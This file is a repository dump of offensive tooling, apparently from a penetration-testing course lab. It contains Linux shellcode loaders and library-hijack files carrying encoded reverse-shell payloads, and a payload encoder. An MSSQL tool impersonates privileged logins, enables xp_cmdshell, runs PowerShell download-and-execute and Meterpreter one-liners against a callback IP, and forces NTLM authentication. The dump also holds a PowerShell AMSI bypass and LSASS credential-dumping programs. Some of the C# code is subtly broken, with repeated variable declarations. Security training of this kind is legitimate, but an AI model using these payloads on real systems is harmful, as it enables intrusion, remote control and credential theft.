64 | f.close() 65 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}") 66 | else: 67 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}") 68 | print(payloadFormatted + "\n") 69 | 70 | # Provide the decoding function for the heck of it 71 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}") 72 | if args.type == "xor": 73 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++) 74 | {{ 75 | buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)}); 76 | }}""" 77 | 78 | if args.type == "rot": 79 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++) 80 | {{ 81 | buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF); 82 | }}""" 83 | 84 | print(decodingFunc) 85 | -------------------------------------------------------------------------------- /Linux Shellcode Loaders/sharedLibrary_LD_LIBRARY_PATH.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // Compile as follows 8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c 9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl 10 | 11 | static void runmahpayload() __attribute__((constructor)); 12 | 13 | int gpgrt_onclose; 14 | // [...output from readelf here...] 15 | int gpgrt_poll; 16 | 17 | // ROT13-encoded 'linux/x64/shell_reverse_tcp' payload 18 | char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12"; 19 | 20 | void runmahpayload() { 21 | setuid(0); 22 | setgid(0); 23 | printf("Library hijacked!\n"); 24 | int buf_len = (int) sizeof(buf); 25 | for (int i=0; i 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | // To compile: 9 | // gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c 10 | // gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl 11 | 12 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c 13 | unsigned char buf[] = 14 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" 15 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10" 16 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" 17 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" 18 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"; 19 | 20 | uid_t geteuid(void) 21 | { 22 | // Get the address of the original 'geteuid' function 23 | typeof(geteuid) *old_geteuid; 24 | old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 25 | 26 | // Fork a new thread based on the current one 27 | if (fork() == 0) 28 | { 29 | // Execute shellcode in the new thread 30 | intptr_t pagesize = sysconf(_SC_PAGESIZE); 31 | 32 | // Make memory executable (required in libs) 33 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) { 34 | // Handle error 35 | perror("mprotect"); 36 | return -1; 37 | } 38 | 39 | // Cast and execute 40 | int (*ret)() = (int(*)())buf; 41 | ret(); 42 | } 43 | else 44 | { 45 | // Original thread, call the original function 46 | printf("[Hijacked] Returning from function...\n"); 47 | return (*old_geteuid)(); 48 | } 49 | // This shouldn't really execute 50 | printf("[Hijacked] Returning from main...\n"); 51 | return -2; 52 | } -------------------------------------------------------------------------------- /Linux Shellcode Loaders/simpleLoader.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // To compile: 6 | // gcc -o simpleLoader simpleLoader.c -z execstack 7 | 8 | // XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa) 9 | unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA"; 10 | 11 | int main (int argc, char **argv) 12 | { 13 | int key = 250; 14 | int buf_len = (int) sizeof(buf); 15 | 16 | // Decode the payload 17 | for (int i=0; i 2 | #include 3 | #include 4 | 5 | // To compile: 6 | // gcc simpleXORencoder.c -o simpleXORencoder 7 | 8 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c 9 | unsigned char buf[] = 10 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" 11 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10" 12 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" 13 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" 14 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"; 15 | 16 | int main (int argc, char **argv) 17 | { 18 | int key = 250; 19 | int buf_len = (int) sizeof(buf); 20 | 21 | printf("XOR payload (key 0xfa):\n"); 22 | 23 | for(int i=0; i 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /MSSQL/MSSQL.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {189219A1-9A2A-4B09-8F69-6207E9996F94} 8 | Exe 9 | MSSQL 10 | MSSQL 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /MSSQL/MSSQL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSSQL", "MSSQL.csproj", "{189219A1-9A2A-4B09-8F69-6207E9996F94}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {BE43F471-75F0-4066-9D25-9B513A0E3956} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /MSSQL/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Data.SqlClient; 3 | 4 | namespace MSSQL 5 | { 6 | public class Program 7 | { 8 | public static String executeQuery(String query, SqlConnection con) 9 | { 10 | SqlCommand cmd = new SqlCommand(query, con); 11 | SqlDataReader reader = cmd.ExecuteReader(); 12 | try 13 | { 14 | String result = ""; 15 | while (reader.Read() == true) 16 | { 17 | result += reader[0] + "\n"; 18 | } 19 | reader.Close(); 20 | return result; 21 | } 22 | catch 23 | { 24 | return ""; 25 | } 26 | } 27 | 28 | public static void getGroupMembership(String groupToCheck, SqlConnection con) 29 | { 30 | String res = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con); 31 | int role = int.Parse(res); 32 | if (role == 1) 33 | { 34 | Console.WriteLine($"[+] User is a member of the '{groupToCheck}' group."); 35 | } 36 | else 37 | { 38 | Console.WriteLine($"[-] User is not a member of the '{groupToCheck}' group."); 39 | } 40 | } 41 | 42 | public static void Main(string[] args) 43 | { 44 | String serv = "dc01.corp1.com"; 45 | String db = "master"; 46 | String conStr = $"Server = {serv}; Database = {db}; Integrated Security = True;"; 47 | SqlConnection con = new SqlConnection(conStr); 48 | 49 | try 50 | { 51 | con.Open(); 52 | Console.WriteLine("[+] Authenticated to MSSQL Server!"); 53 | } 54 | catch 55 | { 56 | Console.WriteLine("[-] Authentication failed."); 57 | Environment.Exit(0); 58 | } 59 | 60 | // Enumerate login info 61 | String login = executeQuery("SELECT SYSTEM_USER;", con); 62 | Console.WriteLine($"[*] Logged in as: {login}"); 63 | String uname = executeQuery("SELECT USER_NAME();", con); 64 | Console.WriteLine($"[*] Database username: {uname}"); 65 | getGroupMembership("public", con); 66 | getGroupMembership("sysadmin", con); 67 | 68 | // Force NTLM authentication for hash-grabbing or relaying 69 | String targetShare = "\\\\192.168.49.67\\share"; 70 | String res = executeQuery($"EXEC master..xp_dirtree \"{targetShare}\";", con); 71 | Console.WriteLine($"[*] Forced authentication to '{targetShare}'."); 72 | 73 | // Get logins that we can impersonate 74 | String res = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; ", con); 75 | Console.WriteLine($"[*] User can impersonate the following logins: {res}."); 76 | 77 | // Impersonate login and get login information 78 | String su = executeQuery("SELECT SYSTEM_USER;", con); 79 | String un = executeQuery("SELECT USER_NAME();", con); 80 | Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'."); 81 | String res = executeQuery("EXECUTE AS LOGIN = 'sa';", con); 82 | Console.WriteLine($"[*] Triggered impersonation."); 83 | su = executeQuery("SELECT SYSTEM_USER;", con); 84 | un = executeQuery("SELECT USER_NAME();", con); 85 | Console.WriteLine($"[*] Current database login is '{su}' with system user '{un}'."); 86 | 87 | // Impersonate dbo in trusted database and execute through 'xp_cmdshell' 88 | String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con); 89 | Console.WriteLine("[*] Triggered impersonation."); 90 | res = executeQuery("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", con); 91 | Console.WriteLine("[*] Enabled 'xp_cmdshell'."); 92 | String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA="; 93 | res = executeQuery($"EXEC xp_cmdshell '{cmd}'", con); 94 | Console.WriteLine($"[*] Executed command! Result: {res}"); 95 | 96 | // Impersonate dbo in trusted database and execute through 'sp_OACreate' 97 | String res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con); 98 | Console.WriteLine("[*] Triggered impersonation."); 99 | res = executeQuery("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", con); 100 | Console.WriteLine("[*] Enabled OLE automation procedures."); 101 | String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA="; 102 | res = executeQuery($"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, '{cmd}';", con); 103 | Console.WriteLine($"[*] Executed command!"); 104 | 105 | // 106 | // Execution via loading custom assemblies is also possible, but for brevity not included here 107 | // 108 | 109 | // Enumerate linked servers 110 | String res = executeQuery("EXEC sp_linkedservers;", con); 111 | Console.WriteLine($"[*] Found linked servers: {res}"); 112 | 113 | // Execute on linked server 114 | String res = executeQuery("EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT DC01;", con); 115 | Console.WriteLine($"[*] Enabled advanced options on DC01."); 116 | res = executeQuery("EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT DC01;", con); 117 | Console.WriteLine($"[*] Enabled xp_cmdshell option on DC01."); 118 | res = executeQuery("EXEC ('xp_cmdshell ''whoami'';') AT DC01;", con); 119 | Console.WriteLine($"[*] Triggered command. Result: {res}"); 120 | 121 | // Execute on linked server via 'openquery' 122 | String res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')", con); 123 | Console.WriteLine($"[*] Enabled advanced options on DC01."); 124 | res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure')", con); 125 | Console.WriteLine($"[*] Enabled xp_cmdshell options on DC01."); 126 | res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; exec xp_cmdshell ''regsvr32 /s /n /u /i:http://192.168.49.67:8080/F0t6R5A.sct scrobj.dll''')", con); 127 | Console.WriteLine($"[*] Triggered Meterpreter oneliner on DC01. Check your listener!"); 128 | 129 | // Escalate via double database linkedString su = executeQuery("SELECT SYSTEM_USER;", con); 130 | Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01'."); 131 | su = executeQuery("select mylogin from openquery(\"dc01\", 'select SYSTEM_USER as mylogin');", con); 132 | Console.WriteLine($"[*] Current system user is '{su}' in database 'dc01' via 1 link."); 133 | su = executeQuery("select mylogin from openquery(\"dc01\", 'select mylogin from openquery(\"appsrv01\", ''select SYSTEM_USER as mylogin'')');", con); 134 | Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01' via 2 links."); 135 | } 136 | } 137 | } -------------------------------------------------------------------------------- /MSSQL/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("MSSQL")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("MSSQL")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("189219a1-9a2a-4b09-8f69-6207e9996f94")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /MiniDump/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /MiniDump/MiniDump.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD} 8 | Exe 9 | MiniDump 10 | MiniDump 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /MiniDump/MiniDump.ps1: -------------------------------------------------------------------------------- 1 | # Bypass AMSI because we're cool 2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true) 3 | 4 | # Utility functions 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 13 | @($moduleName)), $functionName)) 14 | } 15 | 16 | function getDelegateType { 17 | Param ( 18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 19 | [Parameter(Position = 1)] [Type] $delType = [Void] 20 | ) 21 | $type = [AppDomain]::CurrentDomain. 22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 24 | DefineDynamicModule('InMemoryModule', $false). 25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 26 | [System.MulticastDelegate]) 27 | $type. 28 | DefineConstructor('RTSpecialName, HideBySig, Public', 29 | [System.Reflection.CallingConventions]::Standard, $func). 30 | SetImplementationFlags('Runtime, Managed') 31 | $type. 32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 33 | SetImplementationFlags('Runtime, Managed') 34 | return $type.CreateType() 35 | } 36 | 37 | # Add dbghelp.dll and reflectively load the function while we're at it 38 | # (somehow dbghelp.dll doesn't play nice with LookupFunc) 39 | $MethodDefinition = @' 40 | [DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)] 41 | public static extern bool MiniDumpWriteDump( 42 | IntPtr hProcess, 43 | uint processId, 44 | IntPtr hFile, 45 | uint dumpType, 46 | IntPtr expParam, 47 | IntPtr userStreamParam, 48 | IntPtr callbackParam 49 | ); 50 | '@ 51 | $dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru 52 | 53 | # Get LSASS PID 54 | $lsassPid = Get-Process lsass | select -ExpandProperty Id 55 | Write-Host("Got lsass.exe PID: $lsassPid.") 56 | 57 | # Get a handle on LSASS 58 | $handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess), 59 | (getDelegateType @([UInt32], [Bool], [Int])([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid) 60 | Write-Host("Got handle on LSASS: $handle.") 61 | 62 | # Dump process memory to file 63 | $filePath = "C:\Windows\Tasks\lsass.dmp" 64 | $dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read' 65 | $result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero) 66 | $dumpFile.Close() 67 | 68 | if($result) { 69 | Write-Host("Dumped LSASS memory to $filePath.") 70 | }else { 71 | Write-Host("Error dumping LSASS memory.") 72 | } -------------------------------------------------------------------------------- /MiniDump/MiniDump.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MiniDump", "MiniDump.csproj", "{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.ActiveCfg = Debug|x64 19 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.Build.0 = Debug|x64 20 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.ActiveCfg = Release|x64 23 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {32D0848B-922D-49BC-8B90-2F98D24BA0DD} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /MiniDump/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace MiniDump 7 | { 8 | public class Program 9 | { 10 | static int MiniDumpWithFullMemory = 2; 11 | static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF; 12 | 13 | [DllImport("Dbghelp.dll")] 14 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); 15 | 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 18 | 19 | public static void Main(string[] args) 20 | { 21 | // Get the PID of lsass.exe 22 | Process[] lsass = Process.GetProcessesByName("lsass"); 23 | int lsass_pid = lsass[0].Id; 24 | Console.WriteLine($"Got lsass.exe PID: {lsass_pid}."); 25 | 26 | // Get a handle on LSASS 27 | IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid); 28 | Console.WriteLine($"Got a handle on lsass.exe: {handle}."); 29 | 30 | // Dump LSASS process to file 31 | string filePath = "C:\\Windows\\tasks\\lsass.dmp"; 32 | FileStream dumpFile = new FileStream(filePath, FileMode.Create); 33 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 34 | if (dumped) 35 | { 36 | Console.WriteLine($"Dumped LSASS memory to {filePath}."); 37 | } 38 | else 39 | { 40 | Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}"); 41 | } 42 | } 43 | } 44 | } -------------------------------------------------------------------------------- /MiniDump/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("MiniDump")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("MiniDump")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("595d5812-aa30-4ede-95da-8edd7b8844bd")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /PrintSpoofer.NET/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /PrintSpoofer.NET/PrintSpoofer.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {C91C8B29-82DF-49C0-986B-81182CF84E42} 8 | Exe 9 | PrintSpoofer 10 | PrintSpoofer 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /PrintSpoofer.NET/PrintSpoofer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpoofer", "PrintSpoofer.csproj", "{C91C8B29-82DF-49C0-986B-81182CF84E42}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.ActiveCfg = Debug|x64 19 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.Build.0 = Debug|x64 20 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.ActiveCfg = Release|x64 23 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | 